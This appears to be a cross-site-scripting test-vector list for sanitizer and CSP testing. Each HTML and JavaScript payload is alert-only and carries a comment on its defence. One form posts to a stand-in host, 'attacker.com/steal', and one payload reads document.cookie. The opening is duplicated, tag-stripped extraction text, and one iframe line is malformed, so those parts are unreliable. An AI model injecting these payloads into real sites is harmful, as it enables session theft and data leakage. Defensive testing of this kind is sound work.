Drag me
// Test vector: installs a storage-event handler, then writes to localStorage.
// Both statements require script execution to begin with, so the control that
// matters is the one stopping the injection (output encoding, CSP), not the
// storage API itself.
window.onstorage = function(e) { alert('XSS from storage event') };
localStorage.setItem('test', 'XSS');
XSS
Click me
// Test vector: re-targets the current window ('_self') to about:blank and
// writes into the resulting document.
// document.write() parses its argument as HTML, so it is an injection sink:
// never pass untrusted data to it.
var win = window.open('about:blank', '_self');
win.document.write('alert("XSS")');
win.document.close();
// Test vector: a MutationObserver callback fired by an attribute change that
// the script makes itself (expects an element with id 'xss' to exist).
// This is not an injection point; it only shows code running from an observer
// callback once script execution has already been obtained.
var observer = new MutationObserver(function(mutations) {
mutations.forEach(function(mutation) {
alert('XSS via MutationObserver');
});
});
// Watch attribute changes only, then trigger one immediately.
observer.observe(document.getElementById('xss'), { attributes: true });
document.getElementById('xss').setAttribute('data-xss', 'trigger');
Click me
Cut this text
(Unsupported data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=)
// Test vector: an event-handler attribute set from a string via setAttribute();
// the invalid src makes the image load fail, which fires onerror.
// Defence: allowlist attribute names before calling setAttribute() with
// untrusted input and reject every on* name.
var img = document.createElement('img');
img.setAttribute('onerror', 'alert("XSS")');
img.src = 'invalid';
document.body.appendChild(img);
// Test vectors for two contexts: a JavaScript string-literal breakout (quote,
// operator, trailing line comment) and a cookie value carrying script-like text.
// Defence: encode untrusted data for the JS-string context, and treat cookie
// values as untrusted when they are later read back into HTML or script.
''-alert('XSS')//
document.cookie="username=alert('XSS')";
Click me
(Unsupported data:text/html,<script>alert('XSS'))
asd
// Test vector: content typed as text/html is wrapped in a Blob and loaded into
// a dynamically created iframe through a blob: URL.
// Defence: never build text/html Blobs from untrusted data; a restrictive CSP
// frame-src that omits blob: should also refuse the frame.
var blob = new Blob(["alert('XSS')"], { type: 'text/html' });
var url = URL.createObjectURL(blob);
var iframe = document.createElement('iframe');
iframe.src = url;
document.body.appendChild(iframe);
<!-- Test vector: inline ondragstart handler; the attribute value runs as script when
     the user starts dragging the element. Defence: sanitizer allowlists must drop
     every on* attribute, not only the common ones, and a CSP without 'unsafe-inline'
     refuses inline handlers. -->
<div draggable="true" ondragstart="alert('XSS')">Drag me</div>
<script>
// Test vector: registers a storage-event handler, then writes to localStorage.
// Storage events are delivered to other same-origin documents sharing the
// storage area, so a handler like this acts as a cross-tab signal.
// It only runs where script injection already succeeded; the defence is
// output encoding plus a CSP that refuses inline script.
window.onstorage = function(e) { alert('XSS from storage event') };
localStorage.setItem('test', 'XSS');
</script>
<!-- Test vector: onblur on a contenteditable span. The microdata attributes
     (itemscope, itemtype, itemprop) carry no script; the handler attribute is
     what a sanitizer has to remove. -->
<div itemscope itemtype="http://schema.org/Person">
<span itemprop="name" contenteditable onblur="alert('XSS')">XSS</span>
</div>
<!-- Test vector: javascript: URL in href, calling alert as a tagged template so the
     value contains no parentheses. Defence: allowlist URL schemes (http, https,
     mailto) on the parsed URL instead of pattern-matching call syntax. -->
<a href="javascript:alert`XSS`">Click me</a>
<!-- Test vector: SVG use element pointing at a base64 data: URI; the body decodes to
     SVG markup with an onload handler. Defence: reject data: URIs in href and
     xlink:href of untrusted markup rather than inspecting the encoded text. -->
<svg>
<use xlink:href="data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoJ1hTUycpPjwvc3ZnPg=="></use>
</svg>
<script>
// Test vector: navigates the current window ('_self') to about:blank and writes
// into the new document. An about:blank document inherits the origin of the
// page that created it, so whatever is written there runs with this page's
// privileges.
// document.write() parses its argument as HTML: treat it as an injection sink
// and keep untrusted data out of it.
var win = window.open('about:blank', '_self');
win.document.write('alert("XSS")');
win.document.close();
</script>
<!-- Test vector: HTML Imports (link rel="import") with a data: URI. The feature is
     deprecated and not supported by current browsers; sanitizers should still drop
     link elements from untrusted markup. -->
<link rel="import" href="data:text/html,alert('XSS')">
<!-- Test vector: CSP delivered through meta with a javascript: report-uri. The CSP
     specification has report-uri ignored in meta-delivered policies; the point to
     review is whether untrusted markup can inject a meta http-equiv element at all,
     since that lets it alter the page policy. -->
<meta http-equiv="Content-Security-Policy" content="report-uri javascript:alert('XSS')">
<!-- Empty target element observed by the MutationObserver script that follows. -->
<div id="xss"></div>
<script>
// Test vector: a MutationObserver callback triggered by an attribute change on
// the element with id 'xss', made by this same script.
// Not an injection point in itself; it demonstrates code running from an
// observer callback after script execution has already been obtained.
var observer = new MutationObserver(function(mutations) {
mutations.forEach(function(mutation) {
alert('XSS via MutationObserver');
});
});
// Observe attribute mutations only, then cause one so the callback fires.
observer.observe(document.getElementById('xss'), { attributes: true });
document.getElementById('xss').setAttribute('data-xss', 'trigger');
</script>
<!-- Test vector: CSS @import with a javascript: URL. NOTE(review): believed to be
     honoured only by legacy browsers; confirm for the browsers in scope. Defence:
     keep style elements out of untrusted markup and restrict CSS with CSP style-src. -->
<style>@import 'javascript:alert("XSS")';</style>
<!-- Test vector: onclick whose value is a template literal; the expression inside the
     placeholder is evaluated when the handler runs. Defence: remove on* attributes
     instead of pattern-matching their values. -->
<button onclick="`${alert('XSS')}`">Click me</button>
<!-- Test vector: oncut handler, fired when the user cuts text from the field. Same
     defence: no on* attribute survives sanitisation. -->
<textarea oncut="alert('XSS')">Cut this text</textarea>
<!-- Test vector: iframe loading a base64 text/html data: URI; the body decodes to a
     script element calling alert. Defence: allow only vetted https origins in iframe
     src and set CSP frame-src accordingly. -->
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4="></iframe>
<!-- Test vector: injected form that submits to an external host. No script runs; the
     risk is user input being sent off-site. Defence: strip form elements from
     untrusted markup and restrict targets with CSP form-action. -->
<form action="https://attacker.com/steal?data=alert('XSS')">
<input type="submit" value="Submit">
</form>
<script>
// Test vector: DOM-built image whose onerror attribute is set from a string;
// setAttribute() on an on* name compiles the value as a handler, and the
// invalid src makes the load fail so the handler fires.
// Defence: allowlist attribute names before passing untrusted input to
// setAttribute() and reject every on* name; a CSP without 'unsafe-inline'
// also refuses handlers created this way.
var img = document.createElement('img');
img.setAttribute('onerror', 'alert("XSS")');
img.src = 'invalid';
document.body.appendChild(img);
</script>
<!-- Test vector: SMIL animate element that sets xlink:href to a javascript: URL through
     its from value. Defence: sanitizers need to drop animate and set elements whose
     attributeName targets href or xlink:href, because the URL never appears in an
     href attribute that scheme checks would inspect. -->
<svg width="100" height="100">
<animate attributeName="xlink:href" from="javascript:alert('XSS')" to=" " />
</svg>
<!-- Test vectors (next two lines): script content shaped like a JavaScript
     string-literal breakout, and a script that stores script-like text in a cookie.
     NOTE(review): the first script element has no closing tag in this listing.
     Defence: encode untrusted data for the JS-string context, and treat cookie values
     as untrusted whenever they are read back into HTML or script. -->
<script>''-alert('XSS')//
<script>document.cookie="username=alert('XSS')";</script>
<!-- Test vector: quote characters inside an href value, aimed at templates that write
     the attribute with single quotes. As written here the value is double-quoted, so
     the onclick text stays inside href. Defence: encode both quote characters in
     attribute context. -->
<a href="#' onclick='alert(document.cookie)'">Click me</a>
<!-- Test vector: object element loading a base64 text/html data: URI; the body decodes
     to a script element calling alert. Defence: remove object and embed from untrusted
     markup and set CSP object-src 'none'. -->
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ+" type="text/html"></object>
<!-- Test vectors: an iframe with a text/html data: URI, and an audio element whose
     onerror handler fires when the media source fails to load. NOTE(review): the
     iframe line looks damaged by extraction (stray closing script tag, malformed
     closing iframe tag) and is left as found. Defence: restrict iframe src to vetted
     https origins, and strip on* attributes from media elements as from any other. -->
<iframe src="data:text/html,alert('XSS')"></script>">iframe>
asd
<audio src="x" onerror="alert('XSS')"></audio>
<script>
// Test vector: content typed as text/html is wrapped in a Blob and loaded into
// a dynamically created iframe via a blob: URL. A blob: URL carries the origin
// of the page that created it, so the framed document is same-origin.
// Defence: never build text/html Blobs from untrusted data; a restrictive CSP
// frame-src that omits blob: should also refuse the frame.
var blob = new Blob(["alert('XSS')<\/script>"], { type: 'text/html' });
var url = URL.createObjectURL(blob);
var iframe = document.createElement('iframe');
iframe.src = url;
document.body.appendChild(iframe);
</script>